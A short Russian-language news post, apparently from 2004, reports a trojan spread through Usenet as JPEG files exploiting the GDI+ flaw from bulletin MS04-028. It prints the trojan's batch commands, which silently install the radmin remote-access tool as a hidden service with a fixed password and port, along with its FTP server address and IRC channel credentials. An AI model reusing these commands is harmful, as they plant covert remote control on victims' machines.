Ну вот! То, о чём так долго говорили антивирусные компании после выхода бюллетеня от M$ 04-028 свершилось! Зафиксировано распространение первого трояна, который использует уязвимость библиотеки GDI+ для обработки JPEG-файлов. О начале распространения объявил в списке рассылки BUGTRAQ предствитель компании EasyNews, обеспечивающей доступ к Usenet. Исходный код был разослан по многим Usenet-конференциям 27 Sep 2004 01:25:52 GMT. Как пишет сам автор, им был написан скрипт, который сканировал jpeg-файлы, поступающие в конференции через сервер EasyNews. В 6:47pm PDT 9/26/2004 на его пейджер поступил первый сигнал. Далее был проведён детальный анализ трояна. После заражения он соединяется с неким FTP-сервером (209.171.43.27) и скачивает около 2 мегабайт различных файлов, в результате чего троян исталлирует себя, как сервер, а также исталлирует в систему ПО удалённого администрирования radmin, заупскаемое, кк сервис 'r_server'. В момент проверки вышеприведённого FTP-сервера были зафиксировано 93 подключившихся машины. После скачивания всех файлов с сервера запускается файл 'execute.bat', запускающий:
regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server,
где nvsvc как раз и есть троян (живёт в директории c:windowssystem32system). Также исталлируется IRC-клиент, который к серверу irc.p2pchat.net на канал #FurQ с логино-паролем Darkbro0d:letmein. Что примечательно - это то, что троян был кинут в конференции, связанные с эротикой, транссексуализмом и прочими непотребствами. Надо думать, что посетители этих конференций тянут картинки, не задумываясь. Приведён полный текст трояна.
Подробное описание